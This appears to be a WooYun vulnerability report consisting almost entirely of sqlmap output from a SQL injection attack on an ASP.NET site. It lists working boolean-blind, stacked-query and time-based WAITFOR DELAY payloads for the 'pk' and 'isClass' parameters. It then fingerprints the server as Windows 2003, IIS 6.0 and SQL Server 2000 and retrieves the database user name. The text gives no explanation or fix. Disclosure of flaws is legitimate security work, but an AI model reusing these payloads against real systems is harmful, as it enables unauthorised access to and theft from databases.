WooYun.org

Place: GET
Parameter: pk
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pk=15062300001' AND 4124=4124 AND 'deoo'='deoo&isClass=10&setTable=
2
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pk=15062300001'; WAITFOR DELAY '0:0:5';-- AND 'iRlB'='iRlB&isClass=
10&setTable=2
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pk=15062300001' WAITFOR DELAY '0:0:5'-- AND 'fwlJ'='fwlJ&isClass=10
&setTable=2
Place: GET
Parameter: isClass
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pk=15062300001&isClass=10' AND 2928=2928 AND 'tIgd'='tIgd&setTable=
2
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: pk, type: Single quoted string (default)
[1] place: GET, parameter: isClass, type: Single quoted string
[q] Quit
>
[15:54:27] [INFO] testing MySQL
[15:54:28] [WARNING] the back-end DBMS is not MySQL
[15:54:28] [INFO] testing Oracle
[15:54:29] [WARNING] the back-end DBMS is not Oracle
[15:54:29] [INFO] testing PostgreSQL
[15:54:29] [WARNING] the back-end DBMS is not PostgreSQL
[15:54:29] [INFO] testing Microsoft SQL Server
[15:54:30] [INFO] confirming Microsoft SQL Server
[15:54:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[15:54:32] [INFO] fetching current user
[15:54:32] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[15:54:32] [INFO] retrieved: mytspp
current user:    'mytspp'